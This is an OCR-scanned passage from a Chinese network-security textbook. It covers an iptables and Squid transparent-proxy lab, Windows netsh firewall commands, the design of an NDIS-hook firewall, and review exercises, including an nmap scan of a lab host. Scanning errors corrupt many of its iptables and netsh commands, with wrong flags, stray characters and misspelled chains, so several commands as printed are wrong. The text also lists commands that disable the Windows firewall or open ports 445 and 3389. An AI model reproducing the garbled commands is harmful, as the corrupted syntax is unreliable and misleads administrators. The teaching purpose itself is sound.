Internet 的 速度 ,提高 客户 机 的 访问 命中 率 。 

Squid 控制 用 户 的 访问 权限 等 功能 是 使 用 Squid 的 访问 控制 特性 来 实现 的 。Squid 访 
问 控制 有 两 个 要 素 : ACL 和 访问 列表 。 访 问 列 表 可 以 允许 或 拒绝 某 些 用 户 对 特定 服务 的 
访问 。 

每 个 ACL 由 列表 值 组 成 。 当 进行 匹配 检测 的 时 候 , 多 个 值 由 逻辑 或 运算 连接 , 即 任 一 
ACL 的 值 被 匹配 , 则 这 个 ACL 即 被 匹配 。 可 以 使 用 许多 不 同 的 访问 列表 ,不 同 的 ACL 写 
在 不 同行 中 ,Squid 将 把 它们 组 合 在 一 个 列表 中 。 

【实验 拓扑 】 

实验 网 络 拓扑 见 图 3-8。 

【实验 要 求 】 

在 图 3-8 所 示 的 实验 拓扑 中 ,要 求 使 用 Linux 构建 安全 .可 靠 的 防火 墙 。 具 体 要 求 
如 下 : 

(1) 只 允许 在 防火 墙 主机 上 进行 操作 管理 , 除 管理 员外 禁止 任何 人 访问 防火 墙 。 

(2) 内 部 Web 服务 器 要 求 通过 地 址 映射 发 布 出 去 ,只 允许 外 部 网 络 用 户 访问 Web 服 
务 器 的 80 端口 ,而 且 需 通过 有 效 的 DNS 注册 。 

(3) 内 网 用 户 必 须 通过 防火 墙 才 能 访问 内 部 的 Web 服务 器 ,不 允许 直接 访问 。 

(4) 内 网 FTP 服务 器 只 对 内 部 用 户 提供 服务 , 且 只 允许 内 部 用 户 访 问 FTP 服务 器 的 
21 和 20 端口 ,不 允许 外 部 网 络 用 户 访 问 。 

(5) 内 网 客户 要 求 通过 透明 代理 上 网 (不 需要 在 客户 机 浏览 器 上 做 任何 设置 就 可 以 
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图 3-8 实验 网 络 拓扑 


上 网 )。 
(6) 内 部 用 户 所 有 的 IP 地 址 必须 通过 NAT 转换 之 后 才能 够 访问 外 网 。 
【实验 步骤 】 
第 一 部 分 : 实验 准备 。 
(1) 实验 需要 安装 Apache 和 Vsftpd: 


sudo apt- get install vsftpd 
sudo apt- get install Apache2 


软件 安装 后 ,根据 实际 情况 决定 是 否 对 配置 文件 apache2. conf .vsftpd. conf 和 allowed 
_users. conf 进行 修改 。FTP 还 要 新 建 用户 ,设置 密码 。 

(2) 验证 能 否 正常 访问 WWW 、FTP, 如 不 能 访问 ,需要 予以 解决 。 

(3) 策略 分 析 。 实 验 重点 在 防火 墙 策略 的 考量 上 。 通 常 是 先 将 防火 墙 的 策略 设置 为 最 
严格 的 监控 ,然后 根据 需要 逐步 放宽 管理 。 

第 二 部 分 : Linux 下 iptables 的 具体 设置 。 

(1) 清空 filter 表 和 nat 表 中 的 配置 策略 。 

清空 所 选 的 系统 表 filter 中 的 默认 链 : 

iptables -下 

清空 所 选 的 系统 表 nat 中 的 默认 链 : 

iptables -了 -七 nat 

删除 表 中 的 自 定义 规则 链 : 

iptables -X -七 


指定 链 的 所 有 计数 器 归 零 : 


iptables -2 -七 
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(2) 放行 filter 表 的 默认 OUTPUT 链 ,阻止 FORWARD 链 和 INPUT 链 。 全 部 放行 
nat 表 中 的 PREROUTING 链 、.POSTROUTING 链 以 及 OUTPUT 链 。 设 置 完成 之 后 , 目 
前 的 状态 是 只 允许 数据 从 内 网 出 去 .不 允许 外 网 任何 数据 进来 。 

设置 默认 策略 规则 : 

iptables -P FORWARD DROP 

iptables ~-P OUTPUT ACCEPT 

iptables -P INTPUT DROP 

iptables -t nat -P PREROUTING ACCEPT 

iptables -t nat -P OUTPUT ACCEPT 

iptables -+t nat - P POSTROUTING ACCEPT 


测试 : 当前 外 网 用 户 是 否 可 以 通过 80 端口 访问 防火 墙 外 网 接口 的 IP 地 址 ? 
(3) 将 内 网 Web 服务 器 的 IP 地 址 映射 到 防火 墙 连接 外 网 接口 的 卫 地 址 上。 命令 
如 下 : 


iptables -tnat -A PREROUTING -Ptcp -d 202.101.200.200 -~ dport 80 -j DNAT - -to- 
destination 192.168.10.20 


设置 完成 之 后 ,外 网 用 户 就 可 以 通过 80 端口 访问 防火 墙 外 网 接口 的 IP 地 址 ,并 能 够 将 
目的 IP 地址 转换 为 内 网 Web 服务 器 的 IP 地 址 ,但 是 还 不 能 够 访问 内 网 Web 服务 器 。 

测试 : IP 地 址 转换 情况 ? 能 和 否 访问 内 网 Web 服务 器 ? 

(4) 放行 转发 访问 内 网 Web 服务 器 的 数据 包 。 命 令 如 下 : 


iptables -A FORWARD -Ptcp -d 192.168.10.20 -- dport 80 -j ACCEPT 


设置 完成 之 后 ,外 网 用 户 除 可 以 通过 80 端口 访问 防火 墙 外 网 接口 的 IP 地 址 ,还 能 够 将 
外 网 IP 地 址 映射 为 内 网 Web 服务 器 的 IP 地 址 ,进而 访问 内 部 Web 服务 器 。 

测试 : 贴 出 外 网 用 户 访 问 内 部 Web 服务 器 的 截图 。 内 网 用 户 能 否 访问 内 网 Web 服 
务 器 ? 

(5) 将 内 网 Web 服务 器 的 IP 地 址 映射 到 防火 墙 连接 内 网 接口 的 IP 地 址 上 。 命 令 
如 下 : 


iptables -t nat ~- A POSTROUTING -P tcp -d 192.168.10.20 - ~- dport 80 -j SNAT --to- 
source 192.168.10.10 


设置 完成 之 后 ,内 网 用 户 就 可 以 通过 访问 防火 墙 内 网 接口 的 IP 地 址 来 访问 内 部 Web 
服务 器 。 之 所 以 不 直接 让 内 网 用 户 通过 内 网 IP 地 址 直接 访问 ,是 为 了 增加 内 网 Web 服务 
器 的 安全 性 。 

测试 : 贴 出 内 网 用 户 访问 内 部 Web 服务 器 的 截图 。 内 网 用 户 能 否 访问 Internet? 

(6) 在 防火 墙 中 添加 透明 代理 设置 的 规则 。 命 令 如 下 : 


iptables -七 nat - A PREROUTING - s 192.168.10.0/24 -P tcp -~ dport 80 -j REDIRECT - -to- 
posts 3128 


设置 完成 之 后 ,内 网 用 户 访问 外 网 的 Web 服务 器 的 80 端口 都 转换 为 内 网 代理 服务 器 
Squid 的 默认 端口 3128。 只 要 代理 服务 器 能 够 访问 互联 网 ,内 网 用 户 也 就 可 以 访问 互联 网 。 
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测试 : 贴 出 内 网 用 户 访问 内 部 Web 服务 器 的 截图 。 
(7) 设置 Linux 作为 网 关 服务 器 。 命 令 如 下 : 


iptables -tnat -A POSTROUTING -s 192.168.10.0/24 -o ethl -j MASQUERADE 


设置 完成 之 后 ,内 网 所 有 IP 地 址 如 果 访 问 外 网 都 映射 为 防火 墙 外 网 接口 的 IP 地 址 。 

测试 : 内 网 访问 外 网 时 查看 其 内 /外 网 IP 地 址 映射 表 。 

(8) 保存 iptables 的 配置 。 

当 已 经 对 Linux 防火 墙 设置 完毕 ,并 且 需 要 永久 保存 防火 墙 的 设置 时 ,需要 使 用 
iptable-save 命令 将 设置 内 容 保存 到 一 个 指定 的 文件 中 。 默 认 配置 文件 在 /etc/sysconfig/ 
iptables 中 。 当 重新 启动 系统 之 后 ,需要 使 用 iptables-restore 命令 将 保存 的 文件 重新 恢复 
到 /etc/sysconfig/iptables 中 。 

命令 如 下 : 


iptable- save > /etc/sysconfig/iptables save 


第 三 部 分 : Linux 下 Squid 的 具体 设置 。 

(1) Squid 服务 器 的 初始 化 。 

首次 使 用 Squid 服务 器 之 前 需要 先 使 用 squid -z 命令 对 Squid 服务 器 进行 初始 化 。 其 
主要 作用 是 在 Squid 服务 器 的 工作 目录 /var/spool/squid/ 中 建立 需要 的 子 目 录 。 

只 有 在 第 一 次 启动 Squid 服务 器 之 前 才 需 要 进行 服务 器 的 初始 化 工作 ,如 果 不 手 动 执 
行 squid -z 命令 ,Squid 服务 脚本 在 第 一 次 启动 服务 时 也 会 自动 完成 相应 的 初始 化 工作 ,再 
启动 Squid 脚本 程序 。 

注意 : 在 配置 Squid 之 前 ,要 确保 主机 具有 完整 的 域名 。 

命令 如 下 : 


squid -z 
(2) 编辑 Squid 服务 器 的 配置 文件 。 命 令 : 
cat /etc/sysconfig/iptables 


@ 修改 服务 端口 。Squid 服务 器 的 服务 端口 使 用 http_port 配置 项 设置 ,其 默认 值 是 
3128, 为 了 使 用 方便 ,可 以 添加 服务 端口 8080( 或 其 他 端口 )。 


#Default: 
http port 3128 8080 


@ 修改 缓冲 内 存 数 量 。Squid 服务 器 的 性 能 和 Squid 服务 器 使 用 的 缓冲 内 存 数 量 有 很 
大 关系 ,使 用 内 存 越 多 .Squid 服务 器 的 性 能 会 越 好 。 一 般 设置 cache_mem 的 值 设 置 为 服务 
器 物理 内 存 的 1/3 一 1/4 较为 合适 ,cache_mem 默认 的 设置 只 有 8MB。 


#Default: 
cache mem 32 MB 
@ 设置 Squid 的 工作 目录 。Squid 服务 器 缓存 的 内 容 只 有 很 少 的 一 部 分 是 保存 在 缓冲 


内 存 中 的 ,而 代理 服务 中 使 用 的 所 有 文件 都 会 保存 在 Squid 的 工作 目录 中 。 在 squid. conf 
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配置 文件 中 使 用 cache_dir 设置 Squid 服务 器 的 工作 目录 路 径 和 属性 。 
Squid 工作 目录 的 容量 和 子 目 录 的 数量 也 会 在 一 定 程度 上 影响 Squid 服务 器 代理 服务 
的 性 能 ,在 实际 应 用 中 可 根据 实际 情况 适当 扩大 工作 目录 的 总 容量 。 


#Default: 
cache dir ufs /var/spool/squid 100 16 256 


“100 16_256” 分 别 表示 目录 中 最 大 的 容量 是 100MB, 目 录 中 的 一 级 子 目 录 的 数量 为 
16 个 ,二 级 子 目 录 为 256 个 。 

@ 设置 访问 控制 列表 。 在 squid. conf 配置 文件 中 默认 只 人 允许 本 机 使 用 Squid 服务 器 ， 
这 种 策略 也 体现 了 Squid 服务 器 默认 设置 的 严谨 。 为 了 让 局 域 网 所 有 用 户 能 够 通过 Squid 
的 代理 服务 访问 外 部 网 页 ,需要 设置 访问 控制 列表 ,在 acl * 条 目下 添加 “acl clients src 子 
网 地 址 / 子 网 掩 码 ” 


acl safe ports port 80 #http 

acl safe ports port 21 #ftp 

acl safe ports port 443 563 #https, snews 

acl safe ports port 70 #gopher 

acl safe ports port 210 #wais 

acl safe ports port 1025- 65536 #unregistered ports 
acl safe ports port 280 #http- mgmt 

acl safe ports port 488 #gss-http 

acl safe ports port 591 #filemaker 

acl safe ports port 777 #multiling http 


acl clients src 192.168.10.1/24 
在 squid. conf 文件 的 http_access deny all 设置 行 之 前 添加 如 下 设置 : 
http access allow clients 


并 在 http_access deny all 设置 行 之 后 添加 提供 透明 代理 的 相关 功能 ,需要 进行 如 下 
配置 : 


httpd accel host Virtual 

httpd accel port 80 

httpd accel with proxy on 
httpd accel uses host header on 


设置 完成 之 后 ,重新 启动 Squid 服务 ,使 squid. conf 配置 文件 生效 : 


/etc/rc.d/init.d/squid reload 
/etc/rc.d/init.d/squid restart 


Squid 服务 启动 后 ,使 用 netstat 命令 可 以 看 到 Squid 服务 程序 在 3128 端口 进行 代理 服 
务 的 监听 ,这 与 通常 的 代理 服务 器 使 用 8080 端口 是 不 同 的 。 
测试 : 
netstat -ntpl | grep squid 
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3.4 Windows 自 带 防火 墙 


Windows 虽然 不 像 Linux 那样 带 有 iptables,. 但 Windows 有 内 置 的 防火 墙 。 随 着 
Windows 版 本 的 提升 ,Windows 中 的 防火 墙 功能 不 再 简单 ,配置 也 不 再 单一 。 在 Windows 
新 系统 中 防火 墙 的 功能 得 到 了 进一步 的 增强 和 改进 ,成 为 Windows 系统 的 一 道 安全 保障 。 

Windows 的 防火 墙 管 理 有 直观 明了 的 图 形 界面 ,也 有 命令 行 界面 。 命 令 行 界面 是 通过 
网 络 外 过 命令 netsh 来 实现 的 ,一些 基本 的 netsh 防火 墙 命令 可 参见 第 1 章 的 相关 内 容 。 

使 用 命令 行 界面 可 以 使 配置 更 快速 。 一 旦 熟练 掌握 了 使 用 netsh firewall(advfirewall) 
命令 ,在 配置 防火 墙 的 时 候 要 比 使 用 图 形 化 界面 速度 快 得 多 。 特 别 是 在 命令 行 界面 中 可 以 
编写 脚本 ,通过 脚本 工具 可 以 对 一 些 常用 的 功能 编写 脚本 。 在 图 形 化 界面 不 可 用 时 依然 可 
以 和 其 他 命令 行 工具 一 样 配置 防火 墙 ,尤其 是 可 以 在 程序 中 调用 这 些 命令 。 

防火 墙 的 普通 配置 命令 ,可 用 netsh firewall 设置 ,高 级 配置 可 用 netsh advfirewall 
设置 。 

默认 情况 下 ,Windows 7 系统 已 经 开启 了 防火 墙 功能 。 在 命令 提示 符 下 ,可 以 通过 网 络 
外 过 命令 netsh firewall 对 防火 墙 进行 配置 .管理 。 

下 面 是 netsh 对 防火 墙 进行 配置 .管理 的 常用 命令 。 

显示 当前 防火 墙 状态 : netsh firewall show state。 

防火 墙 复位 ( 即 恢复 初始 配置 ) : netsh firewall reset。 

显示 防火 墙 配 置 : netsh firewall show config。 

显示 当前 防火 墙 配置 文件 : netsh firewall show currentprofile。 

显示 防火 墙 允许 的 程序 配置 : netsh firewall show allowedprogram 。 

显示 防火 墙 ICMP 配置 : netsh firewall show icmpsetting。 

显示 防火 墙 记 录 配 置 : netsh firewall show logging。 

显示 防火 墙 多 播 /广播 响应 配置 : netsh firewall show multicastbroadcastresponse。 

显示 防火 墙 通知 配置 : netsh firewall show notifications 。 

显示 防火 墙 操 作 配 置 : netsh firewall show opmode。 

显示 防火 墙 端口 配置 : netsh firewall show portopening。 

显示 防火 墙 服务 配置 : netsh firewall show service。 

开启 防火 墙 允许 例外 : netsh firewall set opmode mode 二 ENABLE。 

关闭 防火 墙 : netsh firewall set opmode mode 王 disable。 

例如 : 

查看 防火 墙 放行 的 程序 : netsh firewall show allowedprogram。 

删除 放行 程序 X. exe: netsh firewall delete allowedprogram C:\X. exe。 

设置 程序 C:\X. exe 并 放行 : netsh firewall set allowedprogram C:\X. exe A 
ENABLE。 

添加 程序 C:\X. exe 并 放行 : netsh firewall add allowedprogram C:N\X. exe A 
ENABLE。 

打开 445 端口 : netsh firewall set portopening TCP 445 ENABLE。 
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远程 桌面 : netsh firewall set portopening TCP 3389 ENABLE。 
开启 ICMP 协议 : netsh firewall set icmpsetting type 王 ALL mode 一 enable。 


3.5 开发 Windows 防火 墙 


尽管 Windows 平台 的 内 置 防火 墙 有 一 定 的 作用 ,但 与 商用 防火 墙 相 比 ,其 不 能 较 好 地 
根据 应 用 程序 进行 控制 ,功能 还 是 较为 单一 。 大 多 数 第 三 方 防火 墙 软件 在 安装 的 时 候 会 自 
动 禁用 Windows 防火 墙 , 而 在 和 印 载 时 又 会 自动 启用 Windows 防火 墙 。 第 三 方 厂商 通过 调 
用 Windows Firewall API 来 实现 这 一 功能 。 然 而 ,既然 防火 墙 软件 可 以 这 么 做 ,其 他 病毒 
或 木马 等 恶意 代码 就 同样 也 可 以 。 病 毒 或 木马 可 以 修改 Windows 防火 墙 程序 ,甚至 干脆 关 
闭 它 。 

Windows 的 网 络 构架 是 分 层 的 ,并 和 OSI 模型 的 层次 结构 有 着 对 应 的 关系 ,数据 包 从 
到 达 网 卡 然 后 传递 到 应 用 程序 ,会 经 历 多 个 不 同 的 逻辑 层 。 这 种 分 层 结构 使 得 防火 墙 可 以 
在 网 络 结构 的 各 个 逻辑 层 对 数据 包 进 行 截获 并 过 滤 ,这 个 过 程 通过 连接 层 与 层 之 间 的 接口 

网 络 防火 墙 都 是 基于 数据 包 的 拦截 技术 之 上 的 。 在 Windows 下 ,数据 包 的 拦截 方式 有 
很 多 种 ,其 原理 和 实现 方式 也 千差万别 。 总 的 来 说 ,可 分 为 “用 户 级 ”和 “内 核 级 ”数据 包 拦 截 
两 大 类 。 

用 户 级 只 能 在 Winsock 层次 上 进行 网 络 数据 包 的 拦截 ,能 拦截 HTTP、FTP、Telnet 和 
POP3 等 应 用 层 协议 网 络 数据 包 ,效率 较 高 ,但 无 法 处 理 网 络 协议 栈 中 底层 协议 的 数据 包 ， 
一 些 木马 和 病毒 很 容易 避 开 这 个 层次 的 监听 。 

内 核 级 有 多 种 数据 包 拦 截 方式 ,例如 基于 TDI 传输 驱动 程序 (TDI-Filter Driver)、 基 于 
NDIS 中 间 层 驱动 (NDIS Intermediate Driver)、 基 于 NDIS 钩子 驱动 (NDIS-Hook Driver) 
等 。 目 前 ,大 部 分 网 络 防火 墙 都 采用 NDIS-Hook Driver 方法 实现 。NDIS-Hook Driver 的 
做 法 是 安装 钧 子 到 ndis. sys 中 ,替换 其 中 的 某 些 关键 函数 ,从 而 达到 截 包 的 目的 。 即 网 络 
防火 墙 只 需要 将 自己 的 函数 挂钩 (hook) 到 ndis. sys 中 即 可 截获 网 络 数据 包 。NDIS 中 间 层 
驱动 位 于 协议 驱动 层 和 小 端口 驱动 之 间 , 它 能 够 截获 所 有 的 网 络 数据 包 。 

NDIS-Hook Driver 方 式 具 有 安装 简单 .可 即时 安装 和 钾 载 驱动 .无须 重 启 系统 .能 截获 
所 有 的 IP 包 、 安 全 性 高 .木马 病毒 不 容易 穿 透 等 优点 。 

基于 Windows 内 核 态 的 个 人 防火 墙 系统 一 般 由 应 用 程序 和 驱动 程序 两 部 分 构成 。 其 
中 驱动 程序 负责 对 非法 数据 包 进 行 拦截 过 滤 ; 应 用 程序 负责 对 数据 包 进行 实时 监控 ,并 向 用 
户 报 告 检测 结果 。 

1. 驱动 程序 设计 

NDIS 中 间 层 过 滤 驱 动 位 于 网 卡 驱动 和 协议 驱动 之 间 , 其 两 个 接口 为 Miniport 接口 和 
Protocol 接口 ,所 有 网 络 数据 包 均 流 经 NDIS 中 间 层 。Passthru 是 Windows DDK 中 提供 
的 一 个 NDIS 中 间 层 驱动 的 开发 框架 。 防 火 墙 的 驱动 部 分 可 以 在 该 框架 的 基础 上 实现 ,其 
主要 的 作用 是 根据 已 定 的 规则 和 黑 名 单 对 非法 数据 进行 过 滤 。 

在 驱动 程序 中 , 先 获 取 数 据 包 ,然后 对 数据 包 过 滤 。 过 滤 按 事先 设 定 的 规则 进行 ,例如 
Etherhdr 头 和 Arp 头 的 MAC 地 址 是 否 匹 配 、 源 MAC 地 址 是 否 属于 黑 名 单 等 ,对 不 符合 要 
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求 的 数据 一 律 丢 弃 。 

2. 应 用 程序 设计 

应 用 程序 是 防火 墙 的 GUI 部 分 ,负责 向 用 户 报告 结果 和 提示 操作 的 界面 。 应 用 程序 对 
数据 包 进 行 监控 分 析 并 设置 过 滤 规 则 ,用 户 通 过 防火 墙 安全 规则 的 设 定向 数据 包 拦截 模块 
传递 规则 。 应 用 程序 实时 显示 数据 包 的 过 滤 和 黑 名 单 的 拦截 情况 。 

3. 驱动 程序 和 应 用 程序 的 通信 

防火 墙 不 仅 要 实现 对 网 络 数据 包 的 拦截 ,还 要 在 分 析 数 据 包 后 ,根据 设 定 的 规则 对 数据 
包 进 行 处 理 ,并 将 保存 日 志 。 因 此 ,驱动 程序 和 应 用 程序 就 要 进行 通信 以 达到 信息 的 交互 。 
驱动 程序 和 应 用 程序 之 间 通 过 共享 内 存 的 方式 实现 通信 ,两 者 间 的 内 存 共享 有 两 种 实现 方 
法 : 一 种 是 通过 共享 内 存 对 象 方法 来 实现 的 , 另 一 种 是 通过 设备 输入 和 输出 控制 方法 来 实 
现 的 。 


习题 3 
1. 判断 题 
(1) 防火 墙 是 设置 在 内 部 网 络 与 外 部 网 络 (如 互联 网 ) 之 间 ; 实 施 访问 控制 策略 的 一 个 
或 一 组 系统 。 ¢ 3 
(2) 组 成 自 适应 代理 网 关 防 火 墙 的 基本 要 素 有 两 个 : 自 适 应 代理 服务 器 (adaptive 
proxy server) 与 动态 包 过 滤器 (dynamic packet filter) 。 ( ) 


(3) 软件 防火 墙 就 是 指 个 人 防火 墙 。 ( 
(4) 防火 墙 提供 的 透明 工作 模式 是 指 防火 墙 工 作 在 数据 链 路 层 , 类 似 于 一 个 网 桥 。 
此 ,不 需要 用 户 对 网 络 的 拓扑 做 出 任何 调整 就 可 以 把 防火 墙 接 入 网 络 。 ( 
(5) 防火 墙 安全 策略 一 旦 设 定 ,就 不 能 再 做 任何 改变 。 ( 
(6) 对 于 防火 墙 的 管理 可 直接 通过 Telnet 进行 。 ( 
(7) 防火 墙 规则 集 的 内 容 决定 了 防火 墙 真正 的 功能 。 ( 
(8) 防火 墙 必须 提供 VPN、NAT 等 功能 。 ( 
(9) 防火 墙 对 用 户 只 能 通过 用 户 名 和 口令 进行 认证 。 ( 
(10) 即使 在 企业 环境 中 ,个 人 防火 墙 作为 企业 纵深 防御 的 一 部 分 也 是 十 分 必要 的 。 
《 刘 
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(11) 只 要 使 用 了 防火 墙 ,企业 的 网 络 安全 就 有 了 绝对 的 保障 。 ( ) 
(12) 防火 墙 规 则 集 应 该 尽 可 能 简单 ,规则 集 越 简单 ,错误 配置 的 可 能 性 就 越 小 ,系统 
就 越 安全 。 ( ) 
(13) iptables 可 配置 具有 状态 包 过 滤 机 制 的 防火 墙 。 《 ) 
(14) 可 以 将 外 部 可 访问 的 服务 器 放置 在 内 部 保护 网 络 中 。 i ) 
(15) 在 一 个 有 多 个 防火 墙 存在 的 环境 中 ,每 个 连接 两 个 防火 墙 的 计算 机 或 网 络 都 是 
DMZ。 ( ) 
(16) 防火 墙 中 不 可 能 存在 漏洞 。 ( ) 


(17) 网 络 边界 保护 中 主要 采用 防火 墙 系统 ,为 了 保证 其 有 效 发 挥 作 用 .应当 避免 在 内 
网 和 外 网 之 间 存 在 不 经 过 防火 墙 控制 的 其 他 通信 连接 。 ¢ 
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(18) 防火 墙 在 静态 包 过 滤 技 术 的 基础 上 ,通过 会 话 状态 检测 技术 将 数据 包 的 过 滤 处 理 
效率 大 幅 提高 。 ( ) 
2. 单 选 题 
(1) 防火 墙 是 ( ) 在 网 络 环境 中 的 应 用 。 
A. 字符 串 匹 配 B. 访问 控制 技术 ”C. 入 侵 检 测 技术 D. 防 病 毒 技 术 
(2) iptables 中 默认 的 表 名 是 ( 加 


A. filter B. firewall C. nat D. mangle 
(3) 包 过 滤 防 火 墙 工作 在 OSI 网 络 参考 模型 的 ( Xs 
A. 物理 层 B. 数据 链 路 层 C. 网 络 层 D. 应 用 层 


(4) 通过 添加 规则 ,允许 通 往 192. 168. 0. 2 的 SSH 连接 通过 防火 墙 的 iptables 指令 是 
《 0 
A. iptables -F INPUTE -d 192. 168. 0. 2 -p tcp -- dport 22 -j ACCEPT 
B. iptables -A INPUT -d 192. 168. 0. 2 -p tcp --dport 23-j ACCEPT 
C. iptables -A FORWARD -d 192. 168.0.2 -ptcp --dport 22 -] ACCEPT 
D. iptables -A FORWARD -d 192. 168. 0. 2 -p tcp --dport 23 -) ACCEPT 
(5) 防火 墙 提供 的 接 入 模式 不 包括 (  )。 
A. 网 关 模 式 B. 透明 模式 C. 混合 模式 D. 旁 路 接 入 模式 
(6) 以 下 关于 包 过 滤 防 火 墙 的 说 法 中 错误 的 是 ( 。”)。 
A. 包 过 滤 防 火 墙 通常 根据 数据 包 源 地 址 .访问 控制 列表 实施 对 数据 包 的 过 滤 
B. 包 过 滤 防 火 墙 不 检查 OSI 网 络 参 考 模型 中 网 络 层 以 上 的 数据 ,因此 可 以 很 快 地 
执行 
C. 包 过 滤 防 火 墙 可 以 有 效 防止 利用 应 用 程序 漏洞 进行 的 攻击 
D. 由 于 要 求 逻 辑 的 一 致 性 、 封 堵 端 口 的 有 效 性 和 规则 集 的 正确 性 ,给 过 滤 规 则 的 
制定 和 配置 带 来 了 复杂 性 ,一 般 操作 人 员 难 以 胜任 管理 ,容易 出 现 错误 
(7) 以 下 关于 应 用 代理 网 关 防 火 墙 的 说 法 中 正确 的 是 ( 》 5 
A. 基于 软件 的 应 用 代理 网 关 工 作 在 OSI 网 络 参 考 模型 的 网 络 层 上 , 它 采 用 应 用 
协议 代理 服务 的 工作 方式 实施 安全 策略 
B. 一 种 服务 需要 一 种 代理 模块 ,扩展 服务 较 难 
C， 和 包 过 滤 防 火 墙 相 比 ,应 用 代理 网 关 防 火 墙 的 处 理 速度 更 快 
D. 不 支持 对 用 户 身份 进行 高 级 认证 机 制 , 一 般 只 能 依据 包头 信息 ,因此 很 容易 受 
到 地 址 欺骗 型 攻击 
(8) 以 下 关于 防火 墙 策 略 的 说 法 中 正确 的 是 ( )。 
A. 在 创建 防火 墙 策 略 以 前 ,不 需要 对 企业 那些 必 不 可 少 的 应 用 软件 进行 风险 分 析 
B. 防火 墙 安全 策略 一 旦 设 定 , 就 不 能 再 作 任 何 改变 
C. 防火 墙 处 理 入 站 通信 的 默认 策略 应 该 是 阻止 所 有 的 包 和 连接 ,除了 被 指出 的 允 
许 通 过 的 通信 类 型 和 连接 
D. 防火 墙 规则 集 与 防火 墙 平 台 体系 结构 无 关 
(9) 以 下 关于 DMZ 区 的 说 法 中 错误 的 是 ( 。 ”)。 
A. 通常 DMZ 包含 允许 来 自 互联 网 的 通信 可 进入 的 设备 ,如 Web 服务 器 、FTP 
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服务 器 、SMTP 服务 器 和 DNS 服务 器 等 
B. 内 部 网 络 可 以 无 限制 地 访问 外 部 网 络 以 及 DMZ 
C. DMZ 可 以 访问 内 部 网 络 
D. 有 两 个 DMZ 的 防火 墙 环 境 的 典型 策略 是 : nn 
内 部 防火 墙 采 用 透明 模式 工作 以 减少 内 部 网 络 结 构 的 复杂 程 
(10) 应 用 代理 防火 墙 的 主要 优点 是 ( ys 


A. 加 密 强度 更 高 B. 安全 控制 更 细 化 、 更 灵活 
C. 安全 服务 的 透明 性 更 好 D. 服务 对 象 更 广泛 
3. 多 选 题 


(1) 防火 墙 通常 阻止 的 数据 包 包 括 ( 策 
A. 来 自 未 授权 的 源 地 址 且 目 的 地 址 为 防火 墙 地 址 的 所 有 入 站 数据 包 ( 除 E-mail 
传递 等 特殊 用 处 的 端口 外 ) 
. 源 地 址 是 内 部 网 络 地 址 的 所 有 入 站 数据 包 
. 所 有 ICMP 类 型 的 人 站 数据 包 
. 来 自 未 授权 的 源 地 址 ,包含 SNMP 的 所 有 入 站 数据 包 
E. 包含 源 路 由 的 所 有 入 站 和 出 站 数据 包 
(2) 目前 市 场 上 主流 防火 墙 提供 的 功能 包括 ( ys 
A. 数据 包 状 态 检测 过 滤 B. 应 用 代理 
C. NAT D. VPN 
E. 日 志 分 析 和 流量 统计 分 析 
(3) 防火 墙 的 局 限 性 包括 ys 
A. 防火 墙 不 能 防御 绕 过 了 它 的 攻击 
B. 防火 墙 不 能 消除 来 自 内 部 的 威胁 
C. 防火 墙 不 能 对 用 户 进行 强身 份 认证 
D. 防火 墙 不 能 阻止 病毒 感染 过 的 程序 和 文件 进出 网 络 
(4) 某 路 由 器 防火 墙 作 了 如 下 配置 


一 


firewall enable 

access- list 101 pemit ip 202.38.0.0 0.0.0.255 10.10.10.10 0.0.0.255 
access- list 101 gdeny tcp 202.38.0.0 0.0.0.255 10.10.10.10 0.0.0.255 gt 1024 
access- list 101 deny ip any any 


端口 配置 如 下 : 


interface Serial0 firewall enable 

ip address 202.38.111.25 255.255.255.0 encapsulation ppp (link- protocol PPP) 

ip access- group 101 in(firewall Packet- filter 101 inbound) interface Ethernet0 
ip address 10.10.10.1 255.255.255.0 


内 部 局 域 网 主机 均 为 10. 10. 10. 0 一 255. 255. 255. 0 网 段 。 假 设 其 他 网 络 均 没有 使 用 防 
火 墙 ,以 下 说 法 正确 的 是 ( 
A. 外 部 主机 202. 38.0. 50 可 以 ping 通 任 何 内 部 主机 
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B. 内 部 主机 10. 10. 10. 5 可 以 任意 访问 外 部 网 络 资源 
C. 外 部 202. 38. 5. 0 一 255. 255. 255. 0 网 段 主机 可 以 与 此 内 部 网 主机 建立 TCP 
连接 
D. 外 部 202. 38.0. 0 一 255.255. 255. 0 网 段 主机 不 可 以 与 此 内 部 网 主机 建立 TCP 
连接 
E. 内 部 任意 主机 都 可 以 与 外 部 任意 主机 建立 TCP 连接 
F. 内 部 任意 主机 只 可 以 与 外 部 202. 38. 0. 0 一 255. 255. 255. 0 网 段 主机 建立 TCP 
连接 
4. 简 答题 
(1) 防火 墙 的 实现 技术 有 哪 两 类 ? 防火 墙 存 在 的 局 限 性 又 有 哪些 ? 
(2) 防火 墙 有 哪些 体系 结构 ? 其 中 堡垒 主机 的 作用 是 什么 ? 检测 计算 机 病毒 的 方法 主 
要 有 哪些 ? 
5. Linux 防火 墙 包 过 滤 实 验 
以 两 台 主机 为 一 组 , 按 要 求 完成 实验 ,注意 给 出 操作 后 的 截图 。 
主机 1 IP: 
主机 2 IP: 和 
防火 墙 建立 在 主机 2 上 。 为 了 应 用 iptables 的 包 过 滤 功 能 ,首先 将 filter 链表 的 所 有 链 
规则 清空 ,并 设置 链表 默认 策略 为 DROP( 禁 止 )。 通 过 向 INPUT 规则 链 插入 新 规则 ,依次 
允许 同 组 主机 ICMP 回 显 请 求 、.Web 请 求 , 最 后 开放 信任 接口 eth0。iptables 操作 期 间 需 同 
组 主机 进行 操作 验证 。 
(1) 在 主机 2 上 清空 filter 链表 的 所 有 链 规则 。iptables 命令 : 


iptables -t filte -F 
(2) 主机 1 使 用 Nmap 工具 对 主机 2 进行 端口 扫描 。Nmap 端口 扫描 命令 : 
nmap -Ss -T5 主机 2 


分 析 扫描 结果 。 
(3) 在 主机 2 上 查看 INPUT .FORWARD 和 OUTPUT 链 默 认 策 略 。iptables 命令 : 


iptables -七 filter -L 


(4) 将 INPUT、FORWARD 和 OUTPUT 链 默 认 策 略 均 设 置 为 DROP。iptables 


iptables ~P INPUT DROP 
iptables ~- P FORWARD DROP 
iptables ~ P OUTPUT DROP 


主机 1 利用 Nmap 对 当前 主机 进行 端口 扫描 ,查看 扫描 结果 ,并 利用 ping 指令 测试 与 
同 组 主机 2 的 连通 性 。 
将 扫描 结果 与 (2) 比 较 , 分 析 扫描 结果 的 差异 。 
(5) 利用 功能 扩展 命令 选项 (ICMP) 设 置 防火 墙 仅 允许 ICMP 回 显 请 求 及 回 显 应 答 。 
